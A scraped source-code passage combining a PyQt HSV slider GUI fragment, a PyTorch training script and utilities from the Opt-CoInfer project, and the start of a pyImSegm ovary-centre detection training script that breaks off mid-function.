QtCore.QObject.connect(self.H_slider, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.H_lcd.display)
QtCore.QObject.connect(self.H_edit, QtCore.SIGNAL(_fromUtf8("textChanged(QString)")), self.H_lcd.display)
QtCore.QObject.connect(self.V_slider, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.V_lcd.display)
QtCore.QObject.connect(self.V_edit, QtCore.SIGNAL(_fromUtf8("textChanged(QString)")), self.V_lcd.display)
QtCore.QObject.connect(self.S_slider, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.S_lcd.display)
QtCore.QObject.connect(self.S_edit, QtCore.SIGNAL(_fromUtf8("textChanged(QString)")), self.S_lcd.display)
QtCore.QMetaObject.connectSlotsByName(Qt_CV_MainWindow)
def retranslateUi(self, Qt_CV_MainWindow):
Qt_CV_MainWindow.setWindowTitle(_translate("Qt_CV_MainWindow", "MainWindow", None))
self.label.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">HSV</span></p></body></html>", None))
self.label_2.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">H</span></p></body></html>", None))
self.label_3.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">S</span></p></body></html>", None))
self.label_4.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">V</span></p></body></html>", None))
self.exec_button.setText(_translate("Qt_CV_MainWindow", "Execute", None))
self.show_button.setText(_translate("Qt_CV_MainWindow", "Show", None))
self.menuFile.setTitle(_translate("Qt_CV_MainWindow", "File", None))
self.actionQuit.setText(_translate("Qt_CV_MainWindow", "Quit", None))
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
Qt_CV_MainWindow = QtGui.QMainWindow()
ui = Ui_Qt_CV_MainWindow()
ui.setupUi(Qt_CV_MainWindow)
Qt_CV_MainWindow.show()
sys.exit(app.exec_())
``` |
{
"source": "jiuyecao/Opt-CoInfer",
"score": 2
} |
#### File: jiuyecao/Opt-CoInfer/train.py
```python
import importlib
import os
import time
import random
import math
import torch
from torch import multiprocessing
from torchvision import datasets, transforms
from torch.utils.data.distributed import DistributedSampler
import numpy as np
from utils.model_profiling import model_profiling
from utils.transforms import Lighting
from utils.distributed import init_dist, master_only, is_master
from utils.distributed import get_rank, get_world_size
from utils.distributed import dist_all_reduce_tensor
from utils.distributed import master_only_print as print
from utils.distributed import AllReduceDistributedDataParallel, allreduce_grads
from utils.loss_ops import CrossEntropyLossSoft, CrossEntropyLossSmooth
from utils.config import FLAGS
from utils.meters import ScalarMeter, flush_scalar_meters
import argparse
import warnings
def get_model():
"""get model"""
model_lib = importlib.import_module(FLAGS.model)
z_architecture_list=[64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']
vgg_layer_id=[2,5,6,9,12,13,16,19,22,23,26,29,32,33,36,39,42,43]
vgg_id=vgg_layer_id[FLAGS.z_partition_id]
z_architecture_list[FLAGS.z_partition_id]=FLAGS.z_pruning_num
model = model_lib.vgg16_bn(z_architecture_list,vgg_id, FLAGS.z_quantization)
if getattr(FLAGS, 'distributed', False):
gpu_id = init_dist()
if getattr(FLAGS, 'distributed_all_reduce', False):
# seems faster
model_wrapper = AllReduceDistributedDataParallel(model.cuda())
else:
model_wrapper = torch.nn.parallel.DistributedDataParallel(
model.cuda(), [gpu_id], gpu_id)
else:
model_wrapper = torch.nn.DataParallel(model).cuda()
return model, model_wrapper
def data_transforms():
"""get transform of dataset"""
if FLAGS.data_transforms in [
'imagenet1k_basic', 'imagenet1k_inception', 'imagenet1k_mobile']:
if FLAGS.data_transforms == 'imagenet1k_inception':
mean = [0.5, 0.5, 0.5]
std = [0.5, 0.5, 0.5]
crop_scale = 0.08
jitter_param = 0.4
lighting_param = 0.1
elif FLAGS.data_transforms == 'imagenet1k_basic':
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
crop_scale = 0.08
jitter_param = 0.4
lighting_param = 0.1
elif FLAGS.data_transforms == 'imagenet1k_mobile':
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
crop_scale = 0.25
jitter_param = 0.4
lighting_param = 0.1
train_transforms = transforms.Compose([
transforms.RandomResizedCrop(224, scale=(crop_scale, 1.0)),
transforms.ColorJitter(
brightness=jitter_param, contrast=jitter_param,
saturation=jitter_param),
Lighting(lighting_param),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=mean, std=std),
])
val_transforms = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=mean, std=std),
])
test_transforms = val_transforms
else:
try:
transforms_lib = importlib.import_module(FLAGS.data_transforms)
return transforms_lib.data_transforms()
except ImportError:
raise NotImplementedError(
'Data transform {} is not yet implemented.'.format(
FLAGS.data_transforms))
return train_transforms, val_transforms, test_transforms
def dataset(train_transforms, val_transforms, test_transforms):
"""get dataset for classification"""
if FLAGS.dataset == 'imagenet1k':
if not FLAGS.test_only:
train_set = datasets.ImageFolder(
os.path.join(FLAGS.dataset_dir, 'train'),
transform=train_transforms)
else:
train_set = None
val_set = datasets.ImageFolder(
os.path.join(FLAGS.dataset_dir, 'val'),
transform=val_transforms)
test_set = None
else:
try:
dataset_lib = importlib.import_module(FLAGS.dataset)
return dataset_lib.dataset(
train_transforms, val_transforms, test_transforms)
except ImportError:
raise NotImplementedError(
'Dataset {} is not yet implemented.'.format(FLAGS.dataset_dir))
return train_set, val_set, test_set
def data_loader(train_set, val_set, test_set):
"""get data loader"""
train_loader = None
val_loader = None
test_loader = None
# infer batch size
if getattr(FLAGS, 'batch_size', False):
if getattr(FLAGS, 'batch_size_per_gpu', False):
assert FLAGS.batch_size == (
FLAGS.batch_size_per_gpu * FLAGS.num_gpus_per_job)
else:
assert FLAGS.batch_size % FLAGS.num_gpus_per_job == 0
FLAGS.batch_size_per_gpu = (
FLAGS.batch_size // FLAGS.num_gpus_per_job)
elif getattr(FLAGS, 'batch_size_per_gpu', False):
FLAGS.batch_size = FLAGS.batch_size_per_gpu * FLAGS.num_gpus_per_job
else:
raise ValueError('batch size (per gpu) is not defined')
batch_size = int(FLAGS.batch_size/get_world_size())
if FLAGS.data_loader == 'imagenet1k_basic':
if getattr(FLAGS, 'distributed', False):
if FLAGS.test_only:
train_sampler = None
else:
train_sampler = DistributedSampler(train_set)
val_sampler = DistributedSampler(val_set)
else:
train_sampler = None
val_sampler = None
if not FLAGS.test_only:
train_loader = torch.utils.data.DataLoader(
train_set,
batch_size=batch_size,
shuffle=(train_sampler is None),
sampler=train_sampler,
pin_memory=True,
num_workers=FLAGS.data_loader_workers,
drop_last=getattr(FLAGS, 'drop_last', False))
val_loader = torch.utils.data.DataLoader(
val_set,
batch_size=batch_size,
shuffle=False,
sampler=val_sampler,
pin_memory=True,
num_workers=FLAGS.data_loader_workers,
drop_last=getattr(FLAGS, 'drop_last', False))
test_loader = val_loader
else:
try:
data_loader_lib = importlib.import_module(FLAGS.data_loader)
return data_loader_lib.data_loader(train_set, val_set, test_set)
except ImportError:
raise NotImplementedError(
'Data loader {} is not yet implemented.'.format(
FLAGS.data_loader))
if train_loader is not None:
FLAGS.data_size_train = len(train_loader.dataset)
if val_loader is not None:
FLAGS.data_size_val = len(val_loader.dataset)
if test_loader is not None:
FLAGS.data_size_test = len(test_loader.dataset)
return train_loader, val_loader, test_loader
def get_lr_scheduler(optimizer):
"""get learning rate"""
warmup_epochs = getattr(FLAGS, 'lr_warmup_epochs', 0)
if FLAGS.lr_scheduler == 'multistep':
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(
optimizer, milestones=FLAGS.multistep_lr_milestones,
gamma=FLAGS.multistep_lr_gamma)
elif FLAGS.lr_scheduler == 'exp_decaying':
lr_dict = {}
for i in range(FLAGS.num_epochs):
if i == 0:
lr_dict[i] = 1
else:
lr_dict[i] = lr_dict[i-1] * FLAGS.exp_decaying_lr_gamma
lr_lambda = lambda epoch: lr_dict[epoch]
lr_scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lr_lambda)
elif FLAGS.lr_scheduler == 'linear_decaying':
num_epochs = FLAGS.num_epochs - warmup_epochs
lr_dict = {}
for i in range(FLAGS.num_epochs):
lr_dict[i] = 1. - (i - warmup_epochs) / num_epochs
lr_lambda = lambda epoch: lr_dict[epoch]
lr_scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lr_lambda)
elif FLAGS.lr_scheduler == 'cosine_decaying':
num_epochs = FLAGS.num_epochs - warmup_epochs
lr_dict = {}
for i in range(FLAGS.num_epochs):
lr_dict[i] = (
1. + math.cos(
math.pi * (i - warmup_epochs) / num_epochs)) / 2.
lr_lambda = lambda epoch: lr_dict[epoch]
lr_scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lr_lambda)
else:
try:
lr_scheduler_lib = importlib.import_module(FLAGS.lr_scheduler)
return lr_scheduler_lib.get_lr_scheduler(optimizer)
except ImportError:
raise NotImplementedError(
'Learning rate scheduler {} is not yet implemented.'.format(
FLAGS.lr_scheduler))
return lr_scheduler
def get_optimizer(model):
"""get optimizer"""
if FLAGS.optimizer == 'sgd':
# all depthwise convolution (N, 1, x, x) has no weight decay
# weight decay only on normal conv and fc
model_params = []
for params in model.parameters():
ps = list(params.size())
if len(ps) == 4 and ps[1] != 1:
weight_decay = FLAGS.weight_decay
elif len(ps) == 2:
weight_decay = FLAGS.weight_decay
else:
weight_decay = 0
item = {'params': params, 'weight_decay': weight_decay,
'lr': FLAGS.lr, 'momentum': FLAGS.momentum,
'nesterov': FLAGS.nesterov}
model_params.append(item)
optimizer = torch.optim.SGD(model_params)
else:
try:
optimizer_lib = importlib.import_module(FLAGS.optimizer)
return optimizer_lib.get_optimizer(model)
except ImportError:
raise NotImplementedError(
'Optimizer {} is not yet implemented.'.format(FLAGS.optimizer))
return optimizer
def set_random_seed(seed=None):
"""set random seed"""
if seed is None:
seed = getattr(FLAGS, 'random_seed', 0)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
@master_only
def get_meters(phase):
"""util function for meters"""
def get_single_meter(phase, suffix=''):
meters = {}
meters['loss'] = ScalarMeter('{}_loss/{}'.format(phase, suffix))
for k in FLAGS.topk:
meters['top{}_error'.format(k)] = ScalarMeter(
'{}_top{}_error/{}'.format(phase, k, suffix))
if phase == 'train':
meters['lr'] = ScalarMeter('learning_rate')
return meters
assert phase in ['train', 'val', 'test', 'cal'], 'Invalid phase.'
meters = {}
for width_mult in FLAGS.width_mult_list:
meters[str(width_mult)] = get_single_meter(phase, str(width_mult))
if phase == 'val':
meters['best_val'] = ScalarMeter('best_val')
return meters
@master_only
def profiling(model, use_cuda):
"""profiling on either gpu or cpu"""
print('Start model profiling, use_cuda: {}.'.format(use_cuda))
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
model.apply(
lambda m: setattr(m, 'width_mult', width_mult))
print('Model profiling with width mult {}x:'.format(width_mult))
flops, params = model_profiling(
model, FLAGS.image_size, FLAGS.image_size, use_cuda=use_cuda,
verbose=getattr(FLAGS, 'profiling_verbose', False))
return flops, params
def lr_schedule_per_iteration(optimizer, epoch, batch_idx=0):
""" function for learning rate scheuling per iteration """
warmup_epochs = getattr(FLAGS, 'lr_warmup_epochs', 0)
num_epochs = FLAGS.num_epochs - warmup_epochs
iters_per_epoch = FLAGS.data_size_train / FLAGS.batch_size
current_iter = epoch * iters_per_epoch + batch_idx + 1
if getattr(FLAGS, 'lr_warmup', False) and epoch < warmup_epochs:
linear_decaying_per_step = FLAGS.lr/warmup_epochs/iters_per_epoch
for param_group in optimizer.param_groups:
param_group['lr'] = current_iter * linear_decaying_per_step
elif FLAGS.lr_scheduler == 'linear_decaying':
linear_decaying_per_step = FLAGS.lr/num_epochs/iters_per_epoch
for param_group in optimizer.param_groups:
param_group['lr'] -= linear_decaying_per_step
elif FLAGS.lr_scheduler == 'cosine_decaying':
mult = (
1. + math.cos(
math.pi * (current_iter - warmup_epochs * iters_per_epoch)
/ num_epochs / iters_per_epoch)) / 2.
for param_group in optimizer.param_groups:
param_group['lr'] = FLAGS.lr * mult
else:
pass
def forward_loss(
model, criterion, input, target, meter, soft_target=None,
soft_criterion=None, return_soft_target=False, return_acc=False):
"""forward model and return loss"""
output = model(input)
if soft_target is not None:
loss = torch.mean(soft_criterion(output, soft_target))
else:
loss = torch.mean(criterion(output, target))
# topk
_, pred = output.topk(max(FLAGS.topk))
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
correct_k = []
for k in FLAGS.topk:
correct_k.append(correct[:k].float().sum(0))
tensor = torch.cat([loss.view(1)] + correct_k, dim=0)
# allreduce
tensor = dist_all_reduce_tensor(tensor)
# cache to meter
tensor = tensor.cpu().detach().numpy()
bs = (tensor.size-1)//2
for i, k in enumerate(FLAGS.topk):
error_list = list(1.-tensor[1+i*bs:1+(i+1)*bs])
if return_acc and k == 1:
top1_error = sum(error_list) / len(error_list)
return loss, top1_error
if meter is not None:
meter['top{}_error'.format(k)].cache_list(error_list)
if meter is not None:
meter['loss'].cache(tensor[0])
if return_soft_target:
return loss, torch.nn.functional.softmax(output, dim=1)
return loss
def run_one_epoch(
epoch, loader, model, criterion, optimizer, meters, phase='train',
soft_criterion=None):
"""run one epoch for train/val/test/cal"""
t_start = time.time()
assert phase in ['train', 'val', 'test', 'cal'], 'Invalid phase.'
train = phase == 'train'
if train:
model.train()
else:
model.eval()
if phase == 'cal':
model.apply(bn_calibration_init)
if getattr(FLAGS, 'distributed', False):
loader.sampler.set_epoch(epoch)
for batch_idx, (input, target) in enumerate(loader):
if phase == 'cal':
if batch_idx == getattr(FLAGS, 'bn_cal_batch_num', -1):
break
target = target.cuda(non_blocking=True)
if train:
# change learning rate if necessary
lr_schedule_per_iteration(optimizer, epoch, batch_idx)
optimizer.zero_grad()
widths_train = FLAGS.width_mult_list
for width_mult in widths_train:
model.apply(
lambda m: setattr(m, 'width_mult', width_mult))
meter = meters[str(width_mult)]
loss = forward_loss(
model, criterion, input, target, meter)
loss.backward()
if (getattr(FLAGS, 'distributed', False)
and getattr(FLAGS, 'distributed_all_reduce', False)):
allreduce_grads(model)
optimizer.step()
if is_master():
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
meter = meters[str(width_mult)]
meter['lr'].cache(optimizer.param_groups[0]['lr'])
else:
pass
else:
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
model.apply(
lambda m: setattr(m, 'width_mult', width_mult))
if is_master():
meter = meters[str(width_mult)]
else:
meter = None
forward_loss(model, criterion, input, target, meter)
if is_master():
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
results = flush_scalar_meters(meters[str(width_mult)])
# print('{:.1f}s\t{}\t{}\t{}/{}: '.format(
# time.time() - t_start, phase, str(width_mult), epoch,
# FLAGS.num_epochs) + ', '.join(
# '{}: {:.3f}'.format(k, v) for k, v in results.items()))
# elif is_master():
# results = flush_scalar_meters(meters)
# print(
# '{:.1f}s\t{}\t{}/{}: '.format(
# time.time() - t_start, phase, epoch, FLAGS.num_epochs) +
# ', '.join('{}: {:.3f}'.format(k, v) for k, v in results.items()))
else:
results = None
return results
def train_val_test():
"""train and val"""
torch.backends.cudnn.benchmark = True
# seed
set_random_seed()
# model
model, model_wrapper = get_model()
if getattr(FLAGS, 'label_smoothing', 0):
criterion = CrossEntropyLossSmooth(reduction='none')
else:
criterion = torch.nn.CrossEntropyLoss(reduction='none')
if getattr(FLAGS, 'inplace_distill', True):
soft_criterion = CrossEntropyLossSoft(reduction='none')
else:
soft_criterion = None
# check pretrained
if getattr(FLAGS, 'pretrained', False):
checkpoint = torch.load(
FLAGS.pretrained, map_location=lambda storage, loc: storage)
# update keys from external models
if type(checkpoint) == dict and 'model' in checkpoint:
checkpoint = checkpoint['model']
model_wrapper.load_state_dict(checkpoint)
print('Loaded model {}.'.format(FLAGS.pretrained))
optimizer = get_optimizer(model_wrapper)
# check resume training
if os.path.exists(os.path.join(FLAGS.log_dir, 'latest_checkpoint.pt')):
checkpoint = torch.load(
os.path.join(FLAGS.log_dir, 'latest_checkpoint.pt'),
map_location=lambda storage, loc: storage)
model_wrapper.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
last_epoch = checkpoint['last_epoch']
lr_scheduler = get_lr_scheduler(optimizer)
lr_scheduler.last_epoch = last_epoch
best_val = checkpoint['best_val']
train_meters, val_meters = checkpoint['meters']
# print('Loaded checkpoint {} at epoch {}.'.format(
# FLAGS.log_dir, last_epoch))
else:
lr_scheduler = get_lr_scheduler(optimizer)
last_epoch = lr_scheduler.last_epoch
best_val = 1.
train_meters = get_meters('train')
val_meters = get_meters('val')
# if start from scratch, print model and do profiling
#print(model_wrapper)
# data
train_transforms, val_transforms, test_transforms = data_transforms()
train_set, val_set, test_set = dataset(
train_transforms, val_transforms, test_transforms)
train_loader, val_loader, test_loader = data_loader(
train_set, val_set, test_set)
if getattr(FLAGS, 'test_only', False) and (test_loader is not None):
print('Start testing.')
# model_wrapper.load_state_dict(torch.load('logs/1.pth'))
test_meters = get_meters('test')
with torch.no_grad():
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
model_wrapper.apply(
lambda m: setattr(m, 'width_mult', width_mult))
run_one_epoch(
last_epoch, test_loader, model_wrapper, criterion,
optimizer, test_meters, phase='test')
return
if getattr(FLAGS, 'nonuniform_diff_seed', False):
set_random_seed(getattr(FLAGS, 'random_seed', 0) + get_rank())
# print('Start training.')
for epoch in range(last_epoch+1, FLAGS.num_epochs):
if getattr(FLAGS, 'skip_training', False):
print('Skip training at epoch: {}'.format(epoch))
break
lr_scheduler.step()
# train
results = run_one_epoch(
epoch, train_loader, model_wrapper, criterion, optimizer,
train_meters, phase='train', soft_criterion=soft_criterion)
# val
if val_meters is not None:
val_meters['best_val'].cache(best_val)
if epoch>0.6*FLAGS.num_epochs:
with torch.no_grad():
results = run_one_epoch(
epoch, val_loader, model_wrapper, criterion, optimizer,
val_meters, phase='val')
if is_master() and results['top1_error'] < best_val:
best_val = results['top1_error']
torch.save(
{
'model': model_wrapper.state_dict(),
},
os.path.join(FLAGS.log_dir, 'best_model.pt'))
print('New best validation top1 error: {:.3f}'.format(best_val))
# save latest checkpoint
# if is_master():
# torch.save(
# {
# 'model': model_wrapper.state_dict(),
# 'optimizer': optimizer.state_dict(),
# 'last_epoch': epoch,
# 'best_val': best_val,
# 'meters': (train_meters, val_meters),
# },
# os.path.join(FLAGS.log_dir, 'latest_checkpoint.pt'))
with open(FLAGS.data_base_address,'a') as f:
id=[0,1,3,4,6,7,8,10,11,12,14,15,16]
f.write('{:.0f}+{:.0f}-{:.0f}*{:.3f} \n'.format(id.index(FLAGS.z_partition_id),FLAGS.z_pruning_num,FLAGS.z_quantization,best_val))
return
def init_multiprocessing():
# print(multiprocessing.get_start_method())
try:
multiprocessing.set_start_method('fork')
except RuntimeError:
pass
def main():
"""train and eval model"""
os.environ["CUDA_VISIBLE_DEVICES"] = str(FLAGS.gpu)
warnings.filterwarnings('ignore')
init_multiprocessing()
train_val_test()
if __name__ == "__main__":
main()
```
#### File: Opt-CoInfer/utils/loss_ops.py
```python
import torch
from utils.config import FLAGS
class CrossEntropyLossSoft(torch.nn.modules.loss._Loss):
""" inplace distillation for image classification """
def forward(self, output, target):
output_log_prob = torch.nn.functional.log_softmax(output, dim=1)
target = target.unsqueeze(1)
output_log_prob = output_log_prob.unsqueeze(2)
cross_entropy_loss = -torch.bmm(target, output_log_prob)
return cross_entropy_loss
class CrossEntropyLossSmooth(torch.nn.modules.loss._Loss):
""" label smooth """
def forward(self, output, target):
eps = FLAGS.label_smoothing
n_class = output.size(1)
one_hot = torch.zeros_like(output).scatter(1, target.view(-1, 1), 1)
target = one_hot * (1 - eps) + (1 - one_hot) * eps / (n_class - 1)
output_log_prob = torch.nn.functional.log_softmax(output, dim=1)
target = target.unsqueeze(1)
output_log_prob = output_log_prob.unsqueeze(2)
cross_entropy_loss = -torch.bmm(target, output_log_prob)
return cross_entropy_loss
```
#### File: Opt-CoInfer/utils/transforms.py
```python
import numpy as np
from PIL import Image
imagenet_pca = {
'eigval': np.asarray([0.2175, 0.0188, 0.0045]),
'eigvec': np.asarray([
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
])
}
class Lighting(object):
def __init__(self, alphastd,
eigval=imagenet_pca['eigval'],
eigvec=imagenet_pca['eigvec']):
self.alphastd = alphastd
assert eigval.shape == (3,)
assert eigvec.shape == (3, 3)
self.eigval = eigval
self.eigvec = eigvec
def __call__(self, img):
if self.alphastd == 0.:
return img
rnd = np.random.randn(3) * self.alphastd
rnd = rnd.astype('float32')
v = rnd
old_dtype = np.asarray(img).dtype
v = v * self.eigval
v = v.reshape((3, 1))
inc = np.dot(self.eigvec, v).reshape((3,))
img = np.add(img, inc)
if old_dtype == np.uint8:
img = np.clip(img, 0, 255)
img = Image.fromarray(img.astype(old_dtype), 'RGB')
return img
def __repr__(self):
return self.__class__.__name__ + '()'
``` |
{
"source": "jiuyueshiwo/pyImSegm",
"score": 3
} |
#### File: pyImSegm/experiments_ovary_centres/run_center_candidate_training.py
```python
import os
import sys
import logging
import argparse
from functools import partial
import tqdm
import pandas as pd
import numpy as np
from scipy import spatial
import matplotlib
if os.environ.get('DISPLAY', '') == '' and matplotlib.rcParams['backend'] != 'agg':
print('No display found. Using non-interactive Agg backend.')
matplotlib.use('Agg')
import matplotlib.pyplot as plt
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.utilities.experiments as tl_expt
import imsegm.utilities.drawing as tl_visu
import imsegm.superpixels as seg_spx
import imsegm.descriptors as seg_fts
import imsegm.classification as seg_clf
import imsegm.labeling as seg_lbs
# whether skip loading triplest CSV from previous run
FORCE_RELOAD = False
# even you have dumped data from previous time, all wil be recomputed
FORCE_RECOMP_DATA = False
EXPORT_TRAINING_DATA = True
# perform the Leave-One-Out experiment
RUN_LEAVE_ONE_OUT = True
# Set experiment folders
FOLDER_EXPERIMENT = 'detect-centers-train_%s'
FOLDER_INPUT = 'inputs_annot'
FOLDER_POINTS = 'candidates'
FOLDER_POINTS_VISU = 'candidates_visul'
FOLDER_POINTS_TRAIN = 'points_train'
LIST_SUBDIRS = [FOLDER_INPUT, FOLDER_POINTS,
FOLDER_POINTS_VISU, FOLDER_POINTS_TRAIN]
NAME_CSV_TRIPLES = 'list_images_segms_centers.csv'
NAME_CSV_STAT_TRAIN = 'statistic_train_centers.csv'
NAME_YAML_PARAMS = 'configuration.yaml'
NAME_DUMP_TRAIN_DATA = 'dump_training_data.npz'
NB_WORKERS = tl_expt.nb_workers(0.9)
# position is label in loaded segm and nb are out labels
LUT_ANNOT_CENTER_RELABEL = [0, 0, -1, 1]
CROSS_VAL_LEAVE_OUT_SEARCH = 0.2
CROSS_VAL_LEAVE_OUT_EVAL = 0.1
CENTER_PARAMS = {
'computer': os.uname(),
'slic_size': 25,
'slic_regul': 0.3,
# 'fts_hist_diams': None,
# 'fts_hist_diams': [10, 25, 50, 75, 100, 150, 200, 250, 300],
'fts_hist_diams': [10, 50, 100, 200, 300],
# 'fts_ray_step': None,
'fts_ray_step': 15,
'fts_ray_types': [('up', [0])],
# 'fts_ray_types': [('up', [0]), ('down', [1])],
'fts_ray_closer': True,
'fts_ray_smooth': 0,
'pca_coef': None,
# 'pca_coef': 0.99,
'balance': 'unique',
'classif': 'RandForest',
# 'classif': 'SVM',
'nb_classif_search': 50,
'dict_relabel': None,
# 'dict_relabel': {0: [0], 1: [1], 2: [2, 3]},
'center_dist_thr': 50, # distance to from annotated center as a point
}
PATH_IMAGES = os.path.join(tl_data.update_path('data_images'),
'drosophila_ovary_slice')
PATH_RESULTS = tl_data.update_path('results', absolute=True)
CENTER_PARAMS.update({
'path_list': os.path.join(PATH_IMAGES,
'list_imgs-segm-center-levels_short.csv'),
'path_images': '',
'path_segms': '',
'path_centers': '',
# 'path_images': os.path.join(PATH_IMAGES, 'image', '*.jpg'),
# 'path_segms': os.path.join(PATH_IMAGES, 'segm', '*.png'),
# 'path_centers': os.path.join(PATH_IMAGES, 'center_levels', '*.png'),
'path_infofile': '',
'path_output': PATH_RESULTS,
'name': 'ovary',
})
def arg_parse_params(params):
"""
SEE: https://docs.python.org/3/library/argparse.html
:return dict:
"""
parser = argparse.ArgumentParser()
parser.add_argument('-list', '--path_list', type=str, required=False,
help='path to the list of input files',
default=params['path_list'])
parser.add_argument('-imgs', '--path_images', type=str, required=False,
help='path to directory & name pattern for images',
default=params['path_images'])
parser.add_argument('-segs', '--path_segms', type=str, required=False,
help='path to directory & name pattern for segmentation',
default=params['path_segms'])
parser.add_argument('-centers', '--path_centers', type=str, required=False,
help='path to directory & name pattern for centres',
default=params['path_centers'])
parser.add_argument('-info', '--path_infofile', type=str, required=False,
help='path to the global information file',
default=params['path_infofile'])
parser.add_argument('-out', '--path_output', type=str, required=False,
help='path to the output directory',
default=params['path_output'])
parser.add_argument('-n', '--name', type=str, required=False,
help='name of the experiment', default='ovary')
parser.add_argument('-cfg', '--path_config', type=str, required=False,
help='path to the configuration', default=None)
parser.add_argument('--nb_workers', type=int, required=False, default=NB_WORKERS,
help='number of processes in parallel')
params.update(vars(parser.parse_args()))
paths = {}
for k in (k for k in params if 'path' in k):
if not isinstance(params[k], str) or params[k].lower() == 'none':
paths[k] = ''
continue
if k in ['path_images', 'path_segms', 'path_centers', 'path_expt']:
p_dir = tl_data.update_path(os.path.dirname(params[k]))
paths[k] = os.path.join(p_dir, os.path.basename(params[k]))
else:
paths[k] = tl_data.update_path(params[k], absolute=True)
p_dir = paths[k]
assert os.path.exists(p_dir), 'missing (%s) %s' % (k, p_dir)
# load saved configuration
if params['path_config'] is not None:
ext = os.path.splitext(params['path_config'])[-1]
assert (ext == '.yaml' or ext == '.yml'), \
'wrong extension for %s' % params['path_config']
data = tl_expt.load_config_yaml(params['path_config'])
params.update(data)
params.update(paths)
logging.info('ARG PARAMETERS: \n %r', params)
return params
def is_drawing(path_out):
""" check if the out folder exist and also if the process is in debug mode
:param str path_out:
:return bool:
# """
bool_res = path_out is not None and os.path.exists(path_out) \
and logging.getLogger().isEnabledFor(logging.DEBUG)
return bool_res
def find_match_images_segms_centers(path_pattern_imgs, path_pattern_segms,
path_pattern_center=None):
""" walk over dir with images and segmentation and pair those with the same
name and if the folder with centers exists also add to each par a center
.. note:: returns just paths
:param str path_pattern_imgs:
:param str path_pattern_segms:
:param str path_pattern_center:
:return DF: DF<path_img, path_segm, path_center>
"""
logging.info('find match images-segms-centres...')
list_paths = [path_pattern_imgs, path_pattern_segms, path_pattern_center]
df_paths = tl_data.find_files_match_names_across_dirs(list_paths)
if not path_pattern_center:
df_paths.columns = ['path_image', 'path_segm']
df_paths['path_centers'] = ''
else:
df_paths.columns = ['path_image', 'path_segm', 'path_centers']
df_paths.index = range(1, len(df_paths) + 1)
return df_paths
def get_idx_name(idx, path_img):
""" create string identifier for particular image
:param int idx: image index
:param str path_img: image path
:return str: identifier
"""
im_name = os.path.splitext(os.path.basename(path_img))[0]
if idx is not None:
return '%03d_%s' % (idx, im_name)
else:
return im_name
def load_image_segm_center(idx_row, path_out=None, dict_relabel=None):
""" by paths load images and segmentation and weather centers exist,
load them if the path out is given redraw visualisation of inputs
:param (int, DF:row) idx_row: tuple of index and row
:param str path_out: path to output directory
:param dict dict_relabel: look-up table for relabeling
:return(str, ndarray, ndarray, [[int, int]]): idx_name, img_rgb, segm, centers
"""
idx, row_path = idx_row
for k in ['path_image', 'path_segm', 'path_centers']:
row_path[k] = tl_data.update_path(row_path[k])
assert os.path.exists(row_path[k]), 'missing %s' % row_path[k]
idx_name = get_idx_name(idx, row_path['path_image'])
img_struc, img_gene = tl_data.load_img_double_band_split(row_path['path_image'],
im_range=None)
# img_rgb = np.array(Image.open(row_path['path_img']))
img_rgb = tl_data.merge_image_channels(img_struc, img_gene)
if np.max(img_rgb) > 1:
img_rgb = img_rgb / float(np.max(img_rgb))
seg_ext = os.path.splitext(os.path.basename(row_path['path_segm']))[-1]
if seg_ext == '.npz':
with np.load(row_path['path_segm']) as npzfile:
segm = npzfile[npzfile.files[0]]
if dict_relabel is not None:
segm = seg_lbs.merge_probab_labeling_2d(segm, dict_relabel)
else:
segm = tl_data.io_imread(row_path['path_segm'])
if dict_relabel is not None:
segm = seg_lbs.relabel_by_dict(segm, dict_relabel)
if row_path['path_centers'] is not None \
and os.path.isfile(row_path['path_centers']):
ext = os.path.splitext(os.path.basename(row_path['path_centers']))[-1]
if ext == '.csv':
centers = tl_data.load_landmarks_csv(row_path['path_centers'])
centers = tl_data.swap_coord_x_y(centers)
elif ext == '.png':
centers = tl_data.io_imread(row_path['path_centers'])
# relabel loaded segm into relevant one
centers = np.array(LUT_ANNOT_CENTER_RELABEL)[centers]
else:
logging.warning('not supported file format %s', ext)
centers = None
else:
centers = None
if is_drawing(path_out):
export_visual_input_image_segm(path_out, idx_name, img_rgb, segm, centers)
return idx_name, img_rgb, segm, centers
def export_visual_input_image_segm(path_out, img_name, img, segm, centers=None):
""" visualise the input image and segmentation in common frame
:param str path_out: path to output directory
:param str img_name: image name
:param ndarray img: np.array
:param ndarray segm: np.array
:param centers: [(int, int)] or np.array
"""
fig = tl_visu.figure_image_segm_centres(img, segm, centers)
fig.savefig(os.path.join(path_out, img_name + '.png'),
